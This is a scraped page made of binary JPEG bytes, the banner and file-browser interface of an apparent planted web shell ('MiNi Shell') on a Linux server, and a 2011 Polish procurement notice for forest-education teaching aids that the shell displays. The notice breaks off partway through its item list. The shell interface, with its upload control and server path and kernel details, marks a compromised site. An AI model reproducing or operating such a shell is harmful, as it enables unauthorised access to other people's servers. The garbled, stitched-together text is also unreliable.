JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110401/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110401/62536-N-2011.html

<p class="kh_header"><b>Jarosław: Dostawa pomocy dydaktycznych na potrzeby edukacji leśnej</b><br>
<b>Numer ogłoszenia: 62536 - 2011; data zamieszczenia: 01.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Jarosław , Koniaczów 1L, 37-500 Jarosław, woj. podkarpackie, tel. 016 6281117, faks 016 6281097.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://start.lasy.gov.pl/web/jaroslaw</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa pomocy dydaktycznych na potrzeby edukacji leśnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa pomocy dydaktycznych na ścieżkę dydaktyczną oraz do Izby Edukacji Leśnej, dostawa zbiorów przyrodniczych oraz pomocy dydaktycznych do prowadzenia obserwacji przyrodniczych do Izby Edukacji Leśnej, zaprojektowanie i wydruk broszur oraz kart pracy, dostawa sprzętu audio.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 22.10.00.00-1, 32.30.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W postępowaniu nie jest przewidziane składanie wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia tj.: posiadają wiedzę i doświadczenie, polegające na wykonaniu dostaw lub usług charakterem odpowiadających przedmiotowi zamówienia zrealizowanych w okresie ostatnich trzech lat przed dniem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, o wartości brutto, co najmniej dla zadania: 
1 - 25 000,00 PLN;
2 - 17 000,00 PLN;
3 - 7 000,00 PLN;
4 - 6 000,00 PLN.
W przypadku gdy wykonawca składa ofertę na więcej niż jedną część (pakiet) winien dysponować doświadczeniem wedle łącznych wymagań dla poszczególnych części. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia na podstawie oświadczenia wykonawcy oraz wykazu dostaw lub usług i referencji</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej tj. dysponują środkami finansowymi lub zdolnością kredytową w wysokości, dla zadania (pakietu):
1 - 25 000,00 PLN;
2 - 17 000,00 PLN;
3 - 7 000,00 PLN;
4 - 6 000,00 PLN.
W przypadku gdy wykonawca składa ofertę na więcej niż jedną część (pakiet) winien dysponować środkami finansowymi lub zdolnością kredytową wedle łącznych wymagań dla poszczególnych części.
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia na podstawie oświadczenia wykonawcy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w formie pisemnej pod rygorem nieważności, w następujących okolicznościach: 
a. konieczności zmiany terminu realizacji spowodowanej: 
- okolicznościami, których nie można było przewidzieć w chwili zawarcia umowy;
- okolicznościami leżącymi po stronie Zamawiającego;
b. konieczności zmiany wynagrodzenia umownego, pod warunkiem, że wiąże się z ograniczeniem zakresu przedmiotu umowy;
c. przyczyn zewnętrznych niezależnych od Zamawiającego oraz wykonawcy skutkujących niemożliwością prowadzenia działań w celu wykonania umowy.
2. Ponadto Zamawiający dopuszcza możliwość zmian redakcyjnych umowy, zmian będących następstwem zmian danych zarówno jego jak i Wykonawcy, w tym ujawnionych w rejestrach publicznych (np. zmiana oznaczenia adresu, nazwy wykonawcy, osoby uprawnionej do kontaktów) oraz innych zmian nie stanowiących zmian treści umowy w stosunku do treści oferty. W takiej sytuacji, wprowadzenie do umowy stosownych zmian nie stanowiących zmian treści umowy w stosunku do treści oferty nie będzie wymagało zachowania formy pisemnej, a jedynie notatki/protokołu zatwierdzonego przez przedstawicieli obu stron.
3. Wszelkie zmiany wprowadzane do umowy dokonywane będą z poszanowaniem obowiązków wynikających z przepisów prawa, w tym w szczególności nie mogą powodować wykroczenia poza określenie przedmiotu zamówienia zawarte w specyfikacji istotnych warunków zamówienia, zgodnie z art. 140 ust. 3 ustawy Prawo zamówień publicznych (t.j. Dz. U. z 2010 r. Nr 113, poz. 759 z późn. zm. ze zm.) oraz nie mogą powodować obejścia przepisu art. 144 ustawy Prawo zamówień publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://start.lasy.gov.pl/web/jaroslaw oraz http://bip.lasy.gov.pl/pl/bip/dg/rdlp_krosno/nadl_radymno/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Koniaczów 1L, 37- 500 Jarosław - siedzibie Zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.04.2011 godzina 10:00, miejsce: Koniaczów 1L, 37- 500 Jarosław - siedziba Zamawiającego pokój nr 1 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie jest współfinansowane ze środków Wojewódzkiego Funduszu Ochrony środowiska i Gospodarki Wodnej w Rzeszowie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa pomocy dydaktycznych na ścieżkę dydaktyczną  oraz  do Izby Edukacji Leśnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje
1. Dostawę i montaż zagadkowych podpisów; 12 szt.; słupki dębowe o długości 1200mm, w tym 500 mm wkopane w ziemię, o przekroju poprzecznym drewna 100x100mm; górna i dolna deska: wielkość min. 300x200mm, grubość min. 50mm, drewno dębowe lub inne twarde liściaste; na górnej desce nadruk rysunku wielkości min. 250x150mm, na dolnej desce rzeźbiony podpis wielkości min 200x150mm; linie podpisu pomalowane farbą w ciemnym kolorze; deski spięte zawiasami; tematyka rysunków i podpisy na dolnej desce: 1.Krzesło gięte; Buk pospolity; 2. Opał; Grab pospolity; 3.Papier lub książka; Brzoza brodawkowata; 4. Szafa; Świerk pospolity; 5. Płot; Olcha czarna; 6. Łyżka; Lipa drobnolistna; 7. Skrzypce; Klon jawor; 8.; Więźba dachowa; Sosna zwyczajna; 9. Trumna; Dąb szypułkowy; 10. Parkiet, klepka podłogowa; Jesion wyniosły; 11. Zapałka; Topola osika; 12. Drewniany kościół; Modrzew europejski;
2. Dostawę i montaż obrotowych klocków na pionowym słupie; 3 szt.; konstrukcja drewniana; wysokość konstrukcji min. 1800mm; czterospadowe zadaszenie drewniane; postument słupka drewniany o przekroju poprzecznym min. 200mm; 4 klocki obracane, ustawione w pionie; klocki o wielkości min. 200x200x200mm, na każdym słupie rysunki dotyczące 4 gatunków drzew; w sumie na klockach umieszczone rysunki dotyczące 12 gatunków drzew: Buk pospolity, Grab pospolity, Brzoza brodawkowata, Świerk pospolity, Olcha czarna, Lipa drobnolistna, Klon jawor, Sosna zwyczajna, Dąb szypułkowy, Jesion wyniosły, Topola osika, Modrzew europejski; dla każdego gatunku na klockach umieszczone rysunki o tematyce: 1. Pokrój drzewa, 2. Owoce i nasiona, 3. Liście, 4. Zastosowanie drewna (rysunki takie jak przy zagadkowych podpisach);
3. Dostawę i montaż stelaża tablicy edukacyjnej (do tablicy z blachy wielkości 1000x800mm); 1 szt.; stelaż wykonany z drewna sosnowego; stelaż składa się ze słupów długości min. 2500mm o średnicy min. 100mm, osadzonych na kotwach metalowych; kotwy osadzone w fundamencie betonowym; oprawa tablicy drewniana krzyżakowa z nieobrzynanego brusa; plecy tablicy zasłonięte pełnym deskowaniem tarcicą o grubości min. 8mm; zadaszenie drewniane dwuspadowe; 
4. Dostawę i montaż tablicy edukacyjnej; 1 szt.; tablica z blachy ocynkowanej o grubości 0,8mm i wielkości 1000x800mm; zabezpieczona folią antygraffiti; tablica na temat wszechstronnego zastosowania drewna; treść tablicy, grafiki i zdjęcia zapewnia Wykonawca; z indywidualizacją (logo LP, nazwa, logo i adres Nadleśnictwa, informacja o dofinansowaniu projektu, zaproszenie na ścieżkę dydaktyczną); Wykonawca przedstawi Zamawiającemu do zatwierdzenia tablicę przed realizacją; montaż na stelażu tablicy edukacyjnej;
5. Dostawa tablicy WFOŚiGW; 2 szt.; tablica z balchy ocynkowanej o grubośći 0,8 mm i wielkości 400x500 mm, zabezpieczona folią antygraffiti; treść tablicy: tablica 1: nazwa inwestora: Nadleśnictwo Jarosław; nazwa zadania: Zobacz, dotknij, usłysz... sensoryczne pomoce dydaktyczne do Izby Edukacji Leśnej Nadleśnictwa Jarosław, tablica 2: nazwa inwestora: Nadleśnictwo Jarosław; nazwa zadania: Ścieżka dydaktyczna Nadleśnictwa Jarosław; Od drzewa do drewna
6. Dostawę tablic edukacyjnych; szt. 10; tablice o wielkości min. 1000x650mm, wykonane z PCV, bez ram; tematyka tablic: warstwowa budowa lasu, budowa drewna, martwe drewno, drzewa liściaste, drzewa iglaste, obieg materii w przyrodzie, dary lasu, zastosowania drewna, ekosystem lasu liściastego, ekosystem lasu iglastego. Wykonawca przedstawi Zamawiającemu koncepcję tablic edukacyjnych, z których Zamawiający wybierze wzory tablic;
7. Dostawę próbek drewna; 6 szt. kompletów; w jednym komplecie 14 sztuk drewnianych deseczek wielkości min. 100x150mm przedstawiających 7 rodzimych gatunków drzew; dla każdego z 7 gatunków drzew po dwie deseczki wykonane z danego drewna; na jednej deseczce ilustracja drzewa (pokrój, liść, owoce i/lub nasiona), na drugiej deseczce nazwa polska i łacińska drzewa; komplet umieszczony w drewnianym, zamykanym pudełku;
8. Dostawę magnetycznej tablicy edukacyjnej z zawieszkami magnetycznymi; 1 szt.; tablica magnetyczna wielkości min. 1500x1000mm, rama drewniana, plecy tablicy z PCV lub innego materiału zapewniającego sztywność tablicy; nadruk na tablicy: ilustracja lasu mieszanego z widocznymi warstwami lasu i charakterystycznymi roślinami (drzewa I i II piętra, podszyt, runo leśne, ściółka, gleba); z indywidualizacją: logo LP i nazwa, logo i adres Nadleśnictwa, informacja o dofinansowaniu projektu; zawieszki magnetyczne przedstawiające rodzime zwierzęta (w tym ssaki, ptaki, owady i organizmy żyjące w glebie); min. 30 szt. zawieszek magnetycznych; 
9. Dostawę deski rzeźbionej Izba Edukacji Leśnej; deska wykonana z brusa nieobrzynanego dębowego o grubości min. 4mm i wielkości min. 2000x300mm; napis rzeźbiony i pomalowany w ciemnym kolorze Izba Edukacji Leśnej wielkości 1700x200mm
10. Dostawę drewnianych linijek; 200 szt.; wykonane z litego drewna, długość min. 200mm; z personalizacją w jednym kolorze: logo LP, nazwa i adres Nadleśnictwa, informacja o dofinansowaniu projektu; 
11. Dostawę drewnianych długopisów; 1000 szt.; długopis z metalową końcówką i z przezroczystą skuwką, wkład czarny lub niebieski; długość min. 140mm; z personalizacją w jednym kolorze: logo LP i nazwa Nadleśnictwa; 
12. Dostawę planów lekcji; 500 szt.; papier w formacie min. A5, gramatura min. 300g/m2; grafika o tematyce przyrodniczej; z personalizacją: logo LP, nazwa, logo i adres Nadleśnictwa, informacja o dofinansowaniu projektu;
13. Dostawę toreb bawełnianych; 300 szt.; torba bawełniana z krótkimi uchwytami; rozmiar min. 350x400mm; z nadrukiem: logo LP, nazwa, logo i adres Nadleśnictwa, informacja o dofinansowaniu projektu.
Wszystkie drewniane elementy powinny być odpowiednio zabezpieczone przed niszczącym działaniem wody, grzybów i owadów żerujących w drewnie. Nadruki rysunków na elementach narażonych na działanie czynników atmosferycznych powinny być  wykonane metodą termotransferu lub inną zapewniająca trwałość nadruku, oraz powinny być zabezpieczone lakierem UV. Wszystkie rysunki, zdjęcia i grafiki na elementach pomocy dydaktycznych zapewnia Wykonawca, z wyjątkiem logo Lasów Państwowych i logo Nadleśnictwa. Wykonawca przedstawi do zatwierdzenia Zamawiającemu rysunki, zdjęcia i grafiki przed realizacją zadania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa zbiorów przyrodniczych oraz pomocy dydaktycznych do prowadzenia obserwacji przyrodniczych do Izby Edukacji Leśnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Dostawę kłody interaktywnej; 1 szt.; stojąca naturalna kłoda dębowa z korą długości min. 1500mm i średnicy min. 500mm; kłoda charakteryzująca się zróżnicowanym stopniem rozkładu drewna (w tym zgnilizna drewna oraz próchnowisko), posiadająca naturalną dziuplę; kłoda obrazująca życie w martwym drewnie; min. 20 szt. różnych gatunków owadów charakterystycznych dla martwego drewna dębowego, w tym owady doskonałe i larwy; owady pojedynczo zatopione w żywicy epoksydowej; owady umiejscowione w charakterystycznych dla nich miejscach bytowania; widoczne żery owadów bytujących w martwym drewnie dębowym; kłoda osadzona na kółkach jezdnych; wnętrze kłody podświetlone; kłoda posiada ruchome elementy, w tym szufladka i wycięte elementy otwierane na zawiasach, ułatwiające poznanie budowy drewna i stopnia rozkładu drewna; widoczny przekrój poprzeczny i promieniowy drewna;
2. Dostawę gablot z nasionami drzew leśnych; 2 szt.; gablota o wymiarach min. 500x400x60mm, obie gabloty zawierają razem nasiona min. 12 gatunków rodzimych drzew leśnych;
3. Dostawę gablot z siewkami drzew leśnych; 2 szt.; gablota o wymiarach min. 
500x400x60mm, obie gabloty zawierają razem siewki min. 14 gatunków rodzimych drzew leśnych;
4. Dostawę gablot z próbkami drewna; 2 szt.; gablota o wymiarach min. 500x400x60mm; obie gabloty zawierają razem próbki drewna min. 18 gatunków rodzimych drzew leśnych;
5. Dostawę gablot z szyszkami; 2 szt.; gabloty zawierające szyszki min. 17 gatunków drzew;
6. Dostawę wałków drewna z przekrojami; 5 szt.; wałki z litego drewna z korą, widoczne przekroje: przekrój poprzeczny, promieniowy i styczny; wielkość wałków: min. 1000mm wysokości i 250mm średnicy; gatunki drzew: Sosna zwyczajna, Buk pospolity, Klon jawor, Jodła pospolita i Lipa drobnolistna;
7. Dostawę skór zwierząt; 5 szt.; wygarbowane skóry 5 gatunków zwierząt, ze skórą z głowy, kończyn i ogona; gatunki: dzik wielkość min. 1000x600mm; jeleń wielkość min. 1300x800mm; sarna wielkość min. 1000x800mm, lis długość min 600mm; zając; borsuk lub kuna;  skóry bez przetarć i wyłysień; 
8. Dostawę rzeźb zwierząt; 10 szt.; rzeźby zwierząt z litego drewna, polerowane olejem lnianym, w naturalnym kolorze drewna, nielakierowane; rzeźby przedstawiające sylwetkę zwierzęcia i główne cechy charakterystyczne (poroże, ogon itp.) rzeźby bez detali; wysokość rzeźb min. 250mm: jeleń, łoś, żubr ; wysokość rzeźb min. 200mm: dzik, sarna ; wysokość rzeźb min. 150mm: lis, wilk, bóbr, zając, borsuk; 
9. Dostawę drewnianej sztalugi; 1 szt.; Sztaluga studyjna duża nr 51 Staciwa lub równoważna: wykonana z drewna bukowego, zabezpieczona impregnatem i polakierowana; wymiary sztalugi: szerokość podstawy min. 650mm; głębokość podstawy min.  540mm, wysokość całkowita sztalugi (przy opuszczonej całkowicie półce) min. 1830mm, wysokość całkowita sztalugi (przy podniesionej maksymalnie półce) max. 2700mm; wyposażona w regulację ustawień umożliwiającą stabilne utrzymanie obrazów o wysokości do 1300mm; 
10. Dostawę lup; 22 szt.; lupa LP 75 mm lub równoważna lupa edukacyjna w plastikowej obudowie z rączką; lupa o średnicy min. 75mm; powiększenie min. 5x; 
11. Dostawę kompasów; 15 szt.; kompas z lusterkiem Eduko lub równoważny: kompas z lusterkiem w plastikowej obudowie; wymiary min. 60x60mm; kompas ze salą magnetyczną; średnica tarczy kompasu min. 50mm;
12. Dostawę taśm mierniczych; 7 szt.; taśma miernicza NEO z włókna szklanego 30 m lub równoważna: taśma miernicza długości min. 30m, szerokości min. 13mm, taśma z włókna szklanego; taśma biała z podziałką co 2mm; taśma odporna na ścieranie i warunki atmosferyczne; składana korbka do zwijania; obudowa z tworzywa odpornego na uderzenia; 
13. Dostawę mikroskopów stereoskopowych; 3 szt.; Mikroskop stereoskopowy Delta Optical NTX-3C w drewnianej skrzynce lub równoważny: mikroskop stereoskopowy; możliwość powiększenia 20x i 40x; oświetlenie preparatu przy użyciu lampy w świetle przechodzącym lub odbitym; stolik płaski z łapkami do mocowania preparatu; wbudowany zasilacz 12 V; obiektywy: 2x, 4x; okular 10x; gwarancja producencka 24 miesiące; mikroskop w drewnianej skrzynce umożliwiającej bezpieczne przechowywanie oraz transport.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zaprojektowanie i wydruk broszur oraz kart pracy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje
1. Sporządzenie projektu graficznego broszury informacyjnej nt. ścieżki dydaktycznej; 1 szt.; broszura o formacie A4 (rozłożony); broszura informacyjna będzie zawierać zaproszenie na ścieżkę, krótki opis ścieżki, zdjęcia ze ścieżki oraz informację o możliwościach dojazdu;
